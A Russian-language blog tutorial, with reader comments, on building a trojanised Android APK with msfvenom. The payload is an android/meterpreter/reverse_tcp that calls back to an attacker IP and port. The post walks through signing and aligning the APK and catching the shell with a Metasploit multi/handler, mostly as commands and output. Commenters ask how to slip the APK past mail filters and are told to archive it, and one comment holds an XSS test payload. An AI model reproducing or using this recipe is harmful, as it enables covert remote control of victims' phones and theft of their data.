Поиск по сайту:
Был он, покуда судьба позволяла, хитрец не последний Средь лигурийцев (Вергилий).

Краткое руководство: Как взломать андроид с Kali Linux

01.05.2017
Краткое руководство: Как взломать андроид с Kali Linux

В нашем недавнем посте мы научились взламывать windows с помощью Kali Linux. На этот раз мы будем взламывать андроид с Kali Linux. Мы сделаем это с использованием инструмента msfvenom в Kali Linux, который является наилучшей комбинацией Msfpayload и Msfencode.


Примечание:
Данное руководство предназначено только для образовательных целей.

Предпосылки для взлома Android

  1. Kali Linux
  2. Android телефон: Для демонстрационных целей использовался  Android emulator предоставленный Google.

Шаги для взлома Android

1. Создать Payload

Чтобы создать троян для взлома Android, нам нужно создать полезную нагрузку, используя утилиту msfvenom в Kali Linux.

root@destroyer:~# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.50 LPORT=4444 R > /root/MyPath/my0704.apk
No platform was selected, choosing Msf::Module::Platform::Android from the payload
No Arch selected, selecting Arch: dalvik from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 9485 bytes

 

В приведенной выше команды LHOST задан IP, используется в команде ifconfig от Kali Linux.

Вышеуказанная команда создает троянский файл apk, который будет установлен на целевой телефон для использования, однако перед этим мы должны подписать этот apk для правильной установки. Следуйте шагам ниже по списку для этого.

а. Создание хранилища ключей:

root@destroyer:~# keytool -genkey -v -keystore my-release-key.Keystore -alias app -keyalg RSA -keysize 2048 -validity 10000

 

Выше команда спрашивает вопросы и пароль.

б. Подписать созданный файл с помощью jarsigner apk.

root@destroyer:~# jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.Keystore /root/MyPath/my0704.apk app
Enter Passphrase for keystore:
adding: META-INF/APP.SF
adding: META-INF/APP.RSA
signing: classes.dex
signing: AndroidManifest.xml
signing: resources.arsc
jar signed.
 
Warning:
No -tsa or -tsacert is provided and this jar is not timestamped. Without a timestamp, users may not be able to validate this jar after the signer certificate's expiration date (2044-08-21) or after any future revocation date.

 

с. Проверьте apk, созданный с помощью jarsigner.

root@destroyer:~# jarsigner -verify -verbose -certs /root/MyPath/my0704.apk

 

д. Оптимизация файла с помощью zipalign apk.

Перед тем как начать работу, установите zipalign с помощью команды ниже:

apt-get install zipalign

 

Теперь позвольте оптимизировать apk.

root@destroyer:~# zipalign -v 4 /root/MyPath/my0704.apk /root/MyPath/my0704_sign.apk
Verifying alignment of /root/MyPath/my0704_sign.apk (4)...
50 META-INF/MANIFEST.MF (OK - compressed)
281 META-INF/APP.SF (OK - compressed)
623 META-INF/APP.RSA (OK - compressed)
1752 META-INF/ (OK)
1802 META-INF/SIGNFILE.SF (OK - compressed)
2087 META-INF/SIGNFILE.RSA (OK - compressed)
2750 classes.dex (OK - compressed)
8726 AndroidManifest.xml (OK - compressed)
10443 resources.arsc (OK - compressed)
Verification successful

 

Таким образом, наш окончательный apk, который мы используем для взлома андроида назван как «my0704_sign.apk».

2. Запустите msfconsole на Kali Linux для эксплуатации телефона Android.

root@destroyer:~# msfconsole
 
Call trans opt: received. 05-01-17 20:00:10 REC:Loc
 
     Trace program: running
 
           wake up, Neo...
        the matrix has you
      follow the white rabbit.
 
          knock, knock, Neo.
 
                        (`.         ,-,
                        ` `.    ,;' /
                         `.  ,'/ .'
                          `. X /.'
                .-;--''--.._` ` (
              .'            /   `
             ,           ` '   Q '
             ,         ,   `._    \
          ,.|         '     `-.;_'
          :  . `  ;    `  ` --,.._;
           ' `    ,   )   .'
              `._ ,  '   /_
                 ; ,''-,;' ``-
                  ``-..__``--`
 
                             http://metasploit.com
 
 
Easy phishing: Set up email templates, landing pages and listeners
in Metasploit Pro -- learn more on http://rapid7.com/metasploit
 
       =[ metasploit v4.12.22-dev                         ]
+ -- --=[ 1577 exploits - 906 auxiliary - 272 post        ]
+ -- --=[ 455 payloads - 39 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
 
msf >

 

В приведенной выше строке msf запустить полезную нагрузку на андроид и мультиобработчик команд exploit с помощью ниже:

msf > use exploit/multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf exploit(handler) >

 

В команде ниже мы используем IP Kali Linux, может быть взят с помощью команды ifconfig на Kali Linux. Кроме того, мы используем номер порта 4444 для эксплуатации.

msf exploit(handler) > set LHOST 192.168.0.50
LHOST => 192.168.0.50
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) >

 

А затем, наконец, использовать команду, которая будет ждать исполнения apk на телефоне Android.

msf exploit(handler) > exploit
 
[*] Started reverse TCP handler on 192.168.0.50:4444
[*] Starting the payload handler...

 

Выполнение apk на андроиде.

Здесь мы используем Android эмулятор предоставленный Google. Следовательно , вам необходимо загрузить образ ISO с сайта Google.

После загрузки вы можете создать нормальную виртуальную машину VMware и смонтировать этот ISO на виртуальной машине, чтобы запустить виртуальную машину машину. Настройка Android VM с помощью id gmail.

 

Если вы нашли ошибку, пожалуйста, выделите фрагмент текста и нажмите Ctrl+Enter.

1 Звезда2 Звезды3 Звезды4 Звезды5 Звезд (1 оценок, среднее: 5,00 из 5)
Загрузка...
Поделиться в соц. сетях:
0 0 голоса
Рейтинг статьи
Подписаться
Уведомить о
guest

**ссылки nofollow

9 комментариев
Старые
Новые Популярные
Межтекстовые Отзывы
Посмотреть все комментарии
loup54

Спасибо, это бомба

Эдик

apk палится почтовиком и не пересылает как спрятать АПК?

OPPYM

Архивом

alert(1);

alert(1);”>alert(1);

ghost557

После первой команды пишет: Нет такого файла или каталога: /root/MyPath/my0704.apk (что делать?)

Pomoshnik ghosta557

Vnimatel’no sledi! Navernoe, u tebya net papki “MyPath”

whoami

MyPath это твой домашний каталог на писать свой на этот

ааа

ничего не происходит после открытия на телефоне

Alanzo

В том то и прикол, поищи в интернете ещё статьи по мсфвеном. Там будет кучка команд)

Читайте также

Спасибо!

Теперь редакторы в курсе.